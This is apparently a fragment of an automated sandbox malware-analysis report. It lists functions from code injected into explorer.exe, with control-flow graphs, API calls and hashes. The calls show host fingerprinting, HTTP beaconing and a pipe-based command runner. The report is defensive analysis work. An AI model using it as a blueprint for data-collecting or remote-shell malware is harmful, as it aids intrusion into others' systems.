2beb4cc 33->38 39 2be86fa-2be8725 wsprintfA 34->39 35->39 42 2be8532-2be8549 call 2beb4cc 37->42 43 2be8573-2be858a call 2beb4cc 37->43 52 2be861a-2be8622 38->52 53 2be860b-2be8618 38->53 39->21 55 2be855a-2be8562 42->55 56 2be854b-2be8558 42->56 57 2be858c-2be8599 43->57 58 2be859b-2be85a3 43->58 51 2be87a6-2be87d7 wsprintfA 45->51 46->51 51->23 54 2be8627-2be8659 wsprintfA 52->54 53->54 59 2be865d-2be8670 54->59 60 2be865b 54->60 61 2be8567-2be8571 55->61 56->61 62 2be85a8-2be85ad 57->62 58->62 59->7 59->29 60->7 63 2be85b2-2be85ed wsprintfA 61->63 62->63 63->33
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 02BEB388: NtAllocateVirtualMemory.NTDLL ref: 02BEB3BE
                                                                                                                                                            • GetAdaptersInfo.IPHLPAPI ref: 02BE8470
                                                                                                                                                            • GetAdaptersInfo.IPHLPAPI ref: 02BE84A7
                                                                                                                                                            • wsprintfA.USER32 ref: 02BE84F0
                                                                                                                                                            • wsprintfA.USER32 ref: 02BE85DB
                                                                                                                                                            • wsprintfA.USER32 ref: 02BE863F
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: wsprintf$AdaptersInfo$AllocateMemoryVirtual
                                                                                                                                                            • String ID: o
                                                                                                                                                            • API String ID: 2074107575-252678980
                                                                                                                                                            • Opcode ID: 297d1a7e7ca8095e50a572676fb4cd9321a35f6664537050dc1b6cbbb83bb27f
                                                                                                                                                            • Instruction ID: 07237836dc465af0d40635e9aa9b6de13f9db9fe273b22db50aad31b676406b2
                                                                                                                                                            • Opcode Fuzzy Hash: 297d1a7e7ca8095e50a572676fb4cd9321a35f6664537050dc1b6cbbb83bb27f
                                                                                                                                                            • Instruction Fuzzy Hash: 12A1D776209B848ADF60DB14F49436AB7A1F788788F440569EA8F83B69EF3CC544CF40
                                                                                                                                                            Function 02BE7274 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 162 2be7274-2be72ab GetAdaptersInfo 163 2be72ad-2be72cd call 2beb388 GetAdaptersInfo 162->163 164 2be72f8-2be72fe 162->164 171 2be72d1-2be72dd 163->171 165 2be730a 164->165 166 2be7300-2be7305 call 2be82b4 164->166 169 2be730f-2be7313 165->169 166->165 172 2be72df-2be72e1 171->172 173 2be72e3-2be72f6 171->173 172->169 173->164 173->171
                                                                                                                                                            APIs
                                                                                                                                                            • GetAdaptersInfo.IPHLPAPI ref: 02BE729C
                                                                                                                                                              • Part of subcall function 02BEB388: NtAllocateVirtualMemory.NTDLL ref: 02BEB3BE
                                                                                                                                                            • GetAdaptersInfo.IPHLPAPI ref: 02BE72C7
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AdaptersInfo$AllocateMemoryVirtual
                                                                                                                                                            • String ID: o
                                                                                                                                                            • API String ID: 2718687846-252678980
                                                                                                                                                            • Opcode ID: 7f42663b622c32a3db8ec0ccf10743740cf63e3247e40a922d1c01b602dc0a8d
                                                                                                                                                            • Instruction ID: 3dbdb59a0c15dec04f7a4b254029ae379215af9c35f466dbf3b72612d61e8e0a
                                                                                                                                                            • Opcode Fuzzy Hash: 7f42663b622c32a3db8ec0ccf10743740cf63e3247e40a922d1c01b602dc0a8d
                                                                                                                                                            • Instruction Fuzzy Hash: 3B01F072608B0486DB309B15E48831EB7A0F3C8B98F444265EACE47B68DF7CC685DF04
                                                                                                                                                            Function 02BEA8E0 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 179 2bea8e0-2bea8fb call 2be8cf0 182 2bea8fd-2bea8ff 179->182 183 2bea904-2bea918 call 2beb4cc 179->183 184 2beaa04-2beaa0b 182->184 187 2bea91a-2bea924 183->187 188 2bea926-2bea92b 183->188 189 2bea930-2bea941 call 2bebf78 187->189 188->189 192 2bea94a-2bea983 call 2beb470 FindFirstFileW 189->192 193 2bea943-2bea945 189->193 196 2bea9f5-2bea9ff call 2be82b4 192->196 197 2bea985-2bea98a 192->197 193->184 196->184 197->196 199 2bea98c-2bea9a1 FindNextFileW 197->199 201 2bea9a5-2bea9ab 199->201 202 2bea9a3 199->202 203 2bea9af-2bea9dc call 2bec144 call 2be7430 201->203 204 2bea9ad 201->204 202->196 209 2bea9de-2bea9f1 LoadLibraryW 203->209 210 2bea9f3 203->210 204->196 209->196 210->197
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: DirectorySystem
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2188284642-0
                                                                                                                                                            • Opcode ID: ba65162137a8887c46524e037aee2d8e48247b8fd7d5144eb10fde51ea88d61c
                                                                                                                                                            • Instruction ID: 41cd26ee5ddc94755a1b64aff1b82d6ac2243428207661208b9dc2a7da8011c2
                                                                                                                                                            • Opcode Fuzzy Hash: ba65162137a8887c46524e037aee2d8e48247b8fd7d5144eb10fde51ea88d61c
                                                                                                                                                            • Instruction Fuzzy Hash: 74311E26118A81D6DF60DB24E88436AB375F7D4364F510766E6EF82AA8DF3CC544CB00
                                                                                                                                                            Function 02BEB388 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18memorynativeCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 221 2beb388-2beb3c6 NtAllocateVirtualMemory 222 2beb3c8-2beb3d2 call 2beb470 221->222 223 2beb3d7-2beb3e0 221->223 222->223
                                                                                                                                                            APIs
                                                                                                                                                            • NtAllocateVirtualMemory.NTDLL ref: 02BEB3BE
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocateMemoryVirtual
                                                                                                                                                            • String ID: @
                                                                                                                                                            • API String ID: 2167126740-2766056989
                                                                                                                                                            • Opcode ID: 2e93f9f6b96c1bd6ea69c113b3f2c8e4b302791aa10c0df241b540a453c9b905
                                                                                                                                                            • Instruction ID: e37ef1ee9727360c26cd02d56bfae5fe7feedc9bf25c1d34db05d18b9feb54b4
                                                                                                                                                            • Opcode Fuzzy Hash: 2e93f9f6b96c1bd6ea69c113b3f2c8e4b302791aa10c0df241b540a453c9b905
                                                                                                                                                            • Instruction Fuzzy Hash: A7E0ACA222468482D6509F65E45470AB760F7847B8F405305BAA906BD8CB7CC114CF00
                                                                                                                                                            Function 02BE5078 Relevance: 1.6, APIs: 1, Instructions: 57filenetworkCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 243 2be5078-2be50ba 244 2be50bc-2be50dc InternetReadFile 243->244 245 2be50de-2be50e3 244->245 246 2be514f 244->246 245->246 247 2be50e5-2be5102 call 2beb704 245->247 248 2be5154-2be515c 246->248 251 2be5108-2be514a call 2beb3e4 247->251 252 2be5104-2be5106 247->252 251->244 252->248
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileInternetRead
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 778332206-0
                                                                                                                                                            • Opcode ID: 29b86a3ab9ddbe11ce9b9fbde145847ecb2975815f7cf14476ac95fa9b6fe6b1
                                                                                                                                                            • Instruction ID: f6eb12cbc2af2a7fb984a4205d5f8d5a4f25340a83c479b820adbcb5fd94ecb4
                                                                                                                                                            • Opcode Fuzzy Hash: 29b86a3ab9ddbe11ce9b9fbde145847ecb2975815f7cf14476ac95fa9b6fe6b1
                                                                                                                                                            • Instruction Fuzzy Hash: 7F21C8323296859BDB70CA15E55479AB3E1F38CB88F804165EA8E83B58EB7DC644CF00
                                                                                                                                                            Function 02BE82B4 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 296 2be82b4-2be82cc 297 2be82ce-2be82eb NtFreeVirtualMemory 296->297 298 2be82ef-2be82f3 296->298 297->298
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FreeMemoryVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3963845541-0
                                                                                                                                                            • Opcode ID: db712fdc7e1c69cc4b3c08b17230264df9142ca57683cf2c056e2540a21d56f0
                                                                                                                                                            • Instruction ID: 9284cde949d1fea6598e9ad4100885fcf05e522a0b35ec1fdf7fb3df10e35bf1
                                                                                                                                                            • Opcode Fuzzy Hash: db712fdc7e1c69cc4b3c08b17230264df9142ca57683cf2c056e2540a21d56f0
                                                                                                                                                            • Instruction Fuzzy Hash: 24E0EC72518A8182DB619B60E404389B760F7853B8F944315EAF912AF8CF7CC289CB04
                                                                                                                                                            Function 02BEC704 Relevance: 1.5, APIs: 1, Instructions: 11nativeCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 299 2bec704-2bec730 NtDelayExecution
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: DelayExecution
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1249177460-0
                                                                                                                                                            • Opcode ID: 551b8892589dcd62e4628d181c76442dc689c90fb238e82810fb464567079569
                                                                                                                                                            • Instruction ID: c8667a19c2c965e1d30d0fbb7cf5caf44128044b0e3ae6efb0ec4c5af53b8674
                                                                                                                                                            • Opcode Fuzzy Hash: 551b8892589dcd62e4628d181c76442dc689c90fb238e82810fb464567079569
                                                                                                                                                            • Instruction Fuzzy Hash: AFD0C77260468087CB145B14E84520E7760F795344FD04529E68D45768DB3CD265CF04
                                                                                                                                                            Function 02BE41B4 Relevance: 9.1, APIs: 6, Instructions: 87COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 9e74177ae8edb192d765eaf2097ca1072eb58028511075e98d8bdaa32260b05f
                                                                                                                                                            • Instruction ID: 38031ce69e784e325fa301e7b0fe783bc4cade89e7a961ec88f2139575a1472e
                                                                                                                                                            • Opcode Fuzzy Hash: 9e74177ae8edb192d765eaf2097ca1072eb58028511075e98d8bdaa32260b05f
                                                                                                                                                            • Instruction Fuzzy Hash: 98315E31228A4182EF60ABB4F94836A7371FB84369F4057A5F9AB466E8DF78C405CB05
                                                                                                                                                            Function 02BE5160 Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 107 2be5160-2be51c7 call 2beb388 call 2beb4cc 112 2be51d8-2be51e0 107->112 113 2be51c9-2be51d6 107->113 114 2be51e5-2be520d call 2bebe64 112->114 113->114 117 2be520f-2be5226 call 2beb4cc 114->117 118 2be5265-2be5275 114->118 127 2be5228-2be5235 117->127 128 2be5237-2be523f 117->128 120 2be5277-2be5280 118->120 121 2be5284-2be528c 118->121 120->121 122 2be5315-2be532c call 2beb4cc 121->122 123 2be5292-2be52a9 call 2beb4cc 121->123 132 2be532e-2be533e 122->132 133 2be5340-2be5348 122->133 135 2be52ba-2be52c2 123->135 136 2be52ab-2be52b8 123->136 130 2be5244-2be525b call 2bebe64 127->130 128->130 130->118 141 2be5260 call 2bebe64 130->141 137 2be5350-2be5397 HttpOpenRequestA 132->137 133->137 139 2be52c7-2be5310 HttpOpenRequestA 135->139 136->139 140 2be539c-2be53a2 137->140 139->140 142 2be53a9-2be53b1 140->142 143 2be53a4 140->143 141->118 144 2be53d6-2be53de 142->144 145 2be53b3-2be53d0 InternetSetOptionA 142->145 146 2be5467-2be546d 143->146 147 2be5424-2be543f HttpSendRequestA 144->147 148 2be53e0-2be5422 call 2bec0fc * 2 HttpSendRequestA 144->148 145->144 149 2be546f-2be5474 call 2be82b4 146->149 150 2be5479 146->150 154 2be5443-2be5448 147->154 148->154 149->150 153 2be547b-2be5482 150->153 156 2be544c-2be545b call 2be82b4 154->156 157 2be544a 154->157 156->146 156->153 157->146
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 02BEB388: NtAllocateVirtualMemory.NTDLL ref: 02BEB3BE
                                                                                                                                                            • HttpOpenRequestA.WININET ref: 02BE5305
                                                                                                                                                            • HttpOpenRequestA.WININET ref: 02BE5391
                                                                                                                                                            • InternetSetOptionA.WININET ref: 02BE53D0
                                                                                                                                                            • HttpSendRequestA.WININET ref: 02BE5418
                                                                                                                                                            • HttpSendRequestA.WININET ref: 02BE5439
                                                                                                                                                              • Part of subcall function 02BE82B4: NtFreeVirtualMemory.NTDLL ref: 02BE82E5
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: HttpRequest$MemoryOpenSendVirtual$AllocateFreeInternetOption
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2140924187-0
                                                                                                                                                            • Opcode ID: 835e16c16b22b6174a5754b7d25c6c2f2fafd1e7607b4187fe6f6a54c6a90b8c
                                                                                                                                                            • Instruction ID: 044c56f8f944a19cee9477a8d77ec72e4329c0af4abecb3acc50653c5ea0c7b5
                                                                                                                                                            • Opcode Fuzzy Hash: 835e16c16b22b6174a5754b7d25c6c2f2fafd1e7607b4187fe6f6a54c6a90b8c
                                                                                                                                                            • Instruction Fuzzy Hash: 2071B572209BC486DB70DB14F48479AB7B1F788798F944126EACA42B69DF7DC584CF40
                                                                                                                                                            Function 02BE8D3C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 174 2be8d3c-2be8d6c call 2beb470 GetUserNameA 177 2be8d6e-2be8d81 wsprintfA 174->177 178 2be8d87-2be8d95 174->178 177->178
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: NameUserwsprintf
                                                                                                                                                            • String ID: hubert
                                                                                                                                                            • API String ID: 54179028-4043692857
                                                                                                                                                            • Opcode ID: 0d2000033b4f6b77b7c63e69016060f77196b9a618d98f030aea10d94a3709f8
                                                                                                                                                            • Instruction ID: f665dd84ca01a7b027052cb9544200b93fd5934fafe888b21506bb2c6bac32bf
                                                                                                                                                            • Opcode Fuzzy Hash: 0d2000033b4f6b77b7c63e69016060f77196b9a618d98f030aea10d94a3709f8
                                                                                                                                                            • Instruction Fuzzy Hash: 14F07D71225A8792EF60EF14EC943E97325FB90748FC15176A14E46969EF7CC60ECB40
                                                                                                                                                            Function 02BE8C30 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 211 2be8c30-2be8c7b call 2beb470 * 2 FindFirstVolumeW 216 2be8c7d-2be8c7f 211->216 217 2be8c81-2be8cd8 GetVolumeInformationW FindVolumeClose 211->217 218 2be8ce5-2be8cec 216->218 219 2be8cda-2be8ce1 217->219 220 2be8ce3 217->220 219->218 220->218
                                                                                                                                                            APIs
                                                                                                                                                            • FindFirstVolumeW.KERNEL32 ref: 02BE8C6A
                                                                                                                                                            • GetVolumeInformationW.KERNEL32 ref: 02BE8CBE
                                                                                                                                                            • FindVolumeClose.KERNEL32 ref: 02BE8CCD
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Volume$Find$CloseFirstInformation
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 586543143-0
                                                                                                                                                            • Opcode ID: 143e719ddec52287121586d21c481339464cc0c977c9cf5c64880edffd785b6e
                                                                                                                                                            • Instruction ID: fbe082a51d7a7f15badd3a0a9d902d23202994b30450f53f0a391fe2fbd34fb3
                                                                                                                                                            • Opcode Fuzzy Hash: 143e719ddec52287121586d21c481339464cc0c977c9cf5c64880edffd785b6e
                                                                                                                                                            • Instruction Fuzzy Hash: AC11E872619A40D7DB60DB10F88839BB3B1F7C5364F904626E2AA42BB8DF7CC559CB40
                                                                                                                                                            Function 02BE8A58 Relevance: 1.6, APIs: 1, Instructions: 94libraryloaderCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 225 2be8a58-2be8a70 226 2be8a79-2be8acc 225->226 227 2be8a72-2be8a74 225->227 229 2be8ad8-2be8ae4 226->229 228 2be8bd4-2be8bd8 227->228 230 2be8aea-2be8b41 call 2bec0fc call 2be7430 229->230 231 2be8bd2 229->231 236 2be8bcd 230->236 237 2be8b47-2be8b4d 230->237 231->228 236->229 237->236 239 2be8b4f-2be8b57 237->239 239->236 240 2be8b59-2be8b61 239->240 241 2be8b75-2be8bcb 240->241 242 2be8b63-2be8b73 GetProcAddress GetProcAddressForCaller 240->242 241->228 242->241
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 190572456-0
                                                                                                                                                            • Opcode ID: dd05d69051d8526e51a2bec147cb8dd081a76b38c43059c36bd5d7d32c083d26
                                                                                                                                                            • Instruction ID: 71f3cbce09620321de831ebbbe41fbfaa3ecad669b879510697aebaf4dc742b9
                                                                                                                                                            • Opcode Fuzzy Hash: dd05d69051d8526e51a2bec147cb8dd081a76b38c43059c36bd5d7d32c083d26
                                                                                                                                                            • Instruction Fuzzy Hash: 99419976619A848BCB60CB19E49072AB7A0F7C8B84F501526EB8E83B68DF3CD551CF00
                                                                                                                                                            Function 02BE545D Relevance: 1.5, APIs: 1, Instructions: 42networkCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 255 2be545d-2be5461 256 2be5467-2be546d 255->256 257 2be5265-2be5275 255->257 258 2be546f-2be5474 call 2be82b4 256->258 259 2be5479 256->259 260 2be5277-2be5280 257->260 261 2be5284-2be528c 257->261 258->259 265 2be547b-2be5482 259->265 260->261 262 2be5315-2be532c call 2beb4cc 261->262 263 2be5292-2be52a9 call 2beb4cc 261->263 270 2be532e-2be533e 262->270 271 2be5340-2be5348 262->271 272 2be52ba-2be52c2 263->272 273 2be52ab-2be52b8 263->273 274 2be5350-2be5397 HttpOpenRequestA 270->274 271->274 275 2be52c7-2be5310 HttpOpenRequestA 272->275 273->275 276 2be539c-2be53a2 274->276 275->276 277 2be53a9-2be53b1 276->277 278 2be53a4 276->278 279 2be53d6-2be53de 277->279 280 2be53b3-2be53d0 InternetSetOptionA 277->280 278->256 281 2be5424-2be543f HttpSendRequestA 279->281 282 2be53e0-2be5422 call 2bec0fc * 2 HttpSendRequestA 279->282 280->279 284 2be5443-2be5448 281->284 282->284 286 2be544c-2be545b call 2be82b4 284->286 287 2be544a 284->287 286->256 286->265 287->256
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: HttpOpenRequest
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1984915467-0
                                                                                                                                                            • Opcode ID: b63ba8eaa06b2abc429e5557986bc836de0240013f192fa4620f15fbf5b13976
                                                                                                                                                            • Instruction ID: 722291238c4f27479b97d4aabab31e1ef96512d0d730dede7331f62e2b209df6
                                                                                                                                                            • Opcode Fuzzy Hash: b63ba8eaa06b2abc429e5557986bc836de0240013f192fa4620f15fbf5b13976
                                                                                                                                                            • Instruction Fuzzy Hash: 2311DD32109B80C6EF719B54F48479AB7B0F789398F940565DBCA42A68DB7DC584CF41
                                                                                                                                                            Function 02BE6C6C Relevance: 1.5, APIs: 1, Instructions: 17threadCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 292 2be6c6c-2be6ca1 CreateThread 293 2be6caa 292->293 294 2be6ca3-2be6ca8 292->294 295 2be6cac-2be6cb0 293->295 294->295
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2422867632-0
                                                                                                                                                            • Opcode ID: 0926225cdb8231c0071b822caba6bf63f9d334e810094fff266de868dfe5a6cc
                                                                                                                                                            • Instruction ID: e9c467b6a1129dd809c662de652699a7f82e52e3d8ab15e38a5688c3a3aed9ef
                                                                                                                                                            • Opcode Fuzzy Hash: 0926225cdb8231c0071b822caba6bf63f9d334e810094fff266de868dfe5a6cc
                                                                                                                                                            • Instruction Fuzzy Hash: 29E08672624B80C5DBA4DF20F98834A77A4F3D4398F806425E58F86B28CF3CC189CB00

                                                                                                                                                            Non-executed Functions

                                                                                                                                                            Function 02BE2164 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 206pipefileprocessCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • CreatePipe.KERNEL32 ref: 02BE2233
                                                                                                                                                            • SetHandleInformation.KERNEL32 ref: 02BE224D
                                                                                                                                                            • CreatePipe.KERNEL32 ref: 02BE226E
                                                                                                                                                            • SetHandleInformation.KERNEL32 ref: 02BE2288
                                                                                                                                                            • CreatePipe.KERNEL32 ref: 02BE22A9
                                                                                                                                                            • SetHandleInformation.KERNEL32 ref: 02BE22C3
                                                                                                                                                            • CreateProcessW.KERNEL32 ref: 02BE2385
                                                                                                                                                              • Part of subcall function 02BEB388: NtAllocateVirtualMemory.NTDLL ref: 02BEB3BE
                                                                                                                                                            • PeekNamedPipe.KERNEL32 ref: 02BE2434
                                                                                                                                                            • ReadFile.KERNEL32 ref: 02BE2490
                                                                                                                                                            • PeekNamedPipe.KERNEL32 ref: 02BE24E4
                                                                                                                                                            • ReadFile.KERNEL32 ref: 02BE2540
                                                                                                                                                            • GetExitCodeProcess.KERNEL32 ref: 02BE2579
                                                                                                                                                            • TerminateProcess.KERNEL32 ref: 02BE25AA
                                                                                                                                                            • CloseHandle.KERNEL32 ref: 02BE25B8
                                                                                                                                                              • Part of subcall function 02BEC704: NtDelayExecution.NTDLL ref: 02BEC726
                                                                                                                                                            • CloseHandle.KERNEL32 ref: 02BE25C6
                                                                                                                                                            • CloseHandle.KERNEL32 ref: 02BE25D4
                                                                                                                                                            • CloseHandle.KERNEL32 ref: 02BE25E2
                                                                                                                                                              • Part of subcall function 02BE82B4: NtFreeVirtualMemory.NTDLL ref: 02BE82E5
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Handle$Pipe$CloseCreate$InformationProcess$FileMemoryNamedPeekReadVirtual$AllocateCodeDelayExecutionExitFreeTerminate
                                                                                                                                                            • String ID: h
                                                                                                                                                            • API String ID: 30365702-2439710439
                                                                                                                                                            • Opcode ID: 1524f5b28a2edb6cb4b23f8a254870fd250a8d12787243c2afd0398788242095
                                                                                                                                                            • Instruction ID: bce427b249cb3fd7195b6aa37f2590ac68307d75756593c70ffb63f31effd2d2
                                                                                                                                                            • Opcode Fuzzy Hash: 1524f5b28a2edb6cb4b23f8a254870fd250a8d12787243c2afd0398788242095
                                                                                                                                                            • Instruction Fuzzy Hash: 3DC1B236218BC08AEB60DB65F89479BB7A1F3C4754F504525EACA83A69DFBDC448CF40
                                                                                                                                                            Function 02BE80B8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43filenativeCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateFileInitStringUnicode
                                                                                                                                                            • String ID: 0$@
